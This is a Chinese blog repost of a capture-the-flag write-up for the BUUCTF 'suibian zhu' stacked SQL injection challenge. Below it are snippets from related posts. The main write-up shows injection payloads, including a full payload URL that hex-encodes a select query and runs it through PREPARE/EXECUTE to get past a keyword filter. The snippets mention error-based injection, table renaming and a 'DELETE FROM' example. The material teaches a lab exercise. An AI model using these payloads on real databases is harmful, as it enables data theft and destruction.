堆叠注入——BUUCTF-随便注

最新推荐文章于 2024-03-10 12:08:27 发布
最新推荐文章于 2024-03-10 12:08:27 发布
阅读量658 收藏 2
点赞数
原文链接:http://www.cnblogs.com/MisakaYuii-Z/p/11480393.html
版权

 

 

 由题目提示知道,这题需要进行sql注入

输入1'发现报错

再输入1';show batabases#出现了一大堆数据库

再输入1';show tables#出现了两个表

 

 

猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现

因为select被过滤了,所以先将select * from `1919810931114514`进行16进制编码

再通过构造payload,得http://677a0eb4-6c6d-4514-b3bb-eacb38a3a347.node1.buuoj.cn?inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

进而得到flag

转载于:https://www.cnblogs.com/MisakaYuii-Z/p/11480393.html

ancan8807
关注
【漏洞挖掘】——118、堆叠注入类型介绍
Fly_鹏程万里
06-27 196
堆叠注入(Stacked injections)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行,而在真实的运用中也是这样的,我们知道在mysql中主要是命令行中每一条语句结尾加;表示语句结束,这样我们就想到了是不是可以多句一起使用呢?这个就叫做stacked injection。
SQL Injection8(堆叠注入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠注入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
BUUCTF 随便WP
小白渣的博客
12-19 1208
我们看到题目,我们由题意可知是sql注入 于是用 ’ 试试 然后我们尝试一些注入的常用的词汇 发现都被过滤了,但是尝试一下 堆叠注入就可发现 ';show tables;# 看了前面大佬的博客可以 绕过关键词过滤 关于MySQL中的预处理语句原理与使用,这篇文章讲解的比较详细:MySQL的SQL预处理(Prepared)本题中由于可以使用堆叠查询,并且需要使用SELECT关键字并绕...
BUUCTF——随便
weixin_45864041的博客
09-21 753
看到题目我们试着正常查询 当上传的数据被直接显示在了URL中,很有可能这里存在sql注入漏洞,接下来,我们可以对猜想进行验证。 通过上面的验证,我们可以直到这里存在sql注入漏洞,并且传递的参数被单引号包裹 从上面可以看到,这里过滤了一些字符,导致我们不能用联合查找的方式进行注入,所以我们换一个思路,看一看是否可以进行堆叠注入 通过上面的测试可以看到,可以进行堆叠注入查表。 查列名,在这里可以看到数字这张表里有flag。 但是select过滤了,我们无法得到fl..
BUUCTF [强网杯 2019]随便
m0_63253040的博客
03-28 803
这题和[SUCTF 2019]EasySQL类似,都可以使用堆叠注入 参考wp 用1' or 1=1#可以爆出所有表内容 尝试联合查询注入 过滤select,where等等,使用堆叠注入 再看表 看下1919810931114514表 发现flag在里面,但是没办法查询,看看word表 可以看见有字段id和data,这里应猜测查询语句 selsect id,data from words where id = 根据查询语句来改掉字段的名字 ...
BUUCTF随便
m0_54993799的博客
12-22 460
输入 1' and updatexml(1, (concat(0x7e,(select database()),0x7e)),1)利用数据库的表的特性,将原来的words表改名为words123,将1919那张表改名为 words;如果直接查值,那就需要 select,但是select已经被限制了。除了查询id=1的值,还把数据库的名字都查出来了。发现一些关键字被限制了,但分号没有被限制,输入 1'"# ,页面返回报错信息。输入 1'# ,得到如下页面。再提交 ' or 1=1 #
buuctf-随便
xixihahawuwu的博客
11-23 283
上没有什么提示,进入环境 有一个提交查询,点击查询,数字为1时回显如下 数字为2回显如下,且文本框内数字自动变为1 当数字大于2时,页面不会返回内容。说明字段数为2 看下源码 咳咳,这就过分了哈.我偏要用 试下’ 再select下 回显了关键字的过滤,union注入没法用 这里有一个知识点就是“堆积注入” 其实就是加了;之后接着注入 1’;show databases;爆下数据库 再爆个表 好啊。尝试下把表内容爆出来 1’;show columns from words; 没啥有用的 下一个,这
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1380
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
SQL注入——堆叠注入
Zhujiangcheng的博客
06-08 928
SQL注入简介——堆叠注入(一)SQL注入的概述和分类1.概述2.分类①按照数据提交的方式来分类:②按照执行效果来分类:③按照注入点类型来分类:(二)堆叠注入1.概念2.局限 (一)SQL注入的概述和分类 1.概述   首说,什么是SQL注入?   程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤、转义、限制,或者处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据,这一构造字符串非法获取数据的过程就被称为SQL注入。 2.分类 (参考来源: link.) ①按照数
WEB渗透学习笔记4——堆叠注入和二次注入
林林木林林L的博客
07-24 2251
堆叠查询注入攻击 Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 unioninjection(
我的世界服务器物品不堆叠,[1.12.2-1.15.2][UltimateStack——终极堆叠]高度自定义你的物品堆叠数量(不只是64)...
weixin_28833069的博客
08-06 2770
JoJo Meme Loadscreen Plugin (Awakening-Splash-1.0.0.jar)com.kamefrede.memeloadscreen.asm.ClassTransformerInventory Tweaks Coremod (InventoryTweaks-1.64+dev.151.jar)invtweaks.forge.asm.ContainerTransfo...
BUUCTF随便
金 帛的博客
04-03 5472
BUUCTF的WP
BUUCTF-随便
最新发布
m0_74167420的博客
03-10 1550
报错注入:报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。简单点说,就是在可以进行的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息。堆叠注入:mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔开,而堆叠注入其实就是通过结束符来执行多条sql语句。(1)报错盲,构建payload:第一种payload:inurl?
BUUCTF-随便(easy_sql)
weixin_51383898的博客
10-13 471
启动靶机,首有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错注入,被过滤了使用联合注入过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠注入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
堆叠注入--随便
qq_43613772的博客
04-30 747
Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入可以执行任何人sql语句。但是当API或数据库引擎的不支持,堆叠注入就不能进行...
buuctf [强网杯 2019]随便
qq_1873822的博客
03-01 265
堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为: Select *
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2669
buuctf的强网杯2019为例的堆叠注入
BUUCTF【WEB】题:随便
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-12 166
可以发现,1919810931114514表中有个名为 flag 的字段,很可能该字段的值就是真正的 flag;:预编译相当于定一个语句相同,参数不同的Mysql模板,我们可以通过预编译的方式,绕过特定的字符过滤。进去之后,发现就一个输入框,测试一下是否存在 SQL 注入,输入万能语句:1' or 1 = 1#将 select 转换成对应的 ASCII 码,从而绕过对 select过滤。发现表都爆出来了,说明存在 SQL 注入漏洞,进一步测试一些其他语句是否可行。举例:查询 id = 1 的用户。
[强网杯 2019]随便 堆叠注入
YUK_103的博客
04-12 809
大纲技能点分析过程这里是我的做法其他做法以上 技能点 堆叠注入 分析过程 首是这么一个界面,如果你再这个表单的框里提交的话在url框上会显示加号比如 12 32 4 ⇒inject=12+32+4 。那么我们就直接在url框里注入即可。 然后接着 ?inject=1’ order by 2# 发现报错怀疑是“#”被过滤了,换成 --+后正常访问 由于order by 3报错,那么常规套路:1...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值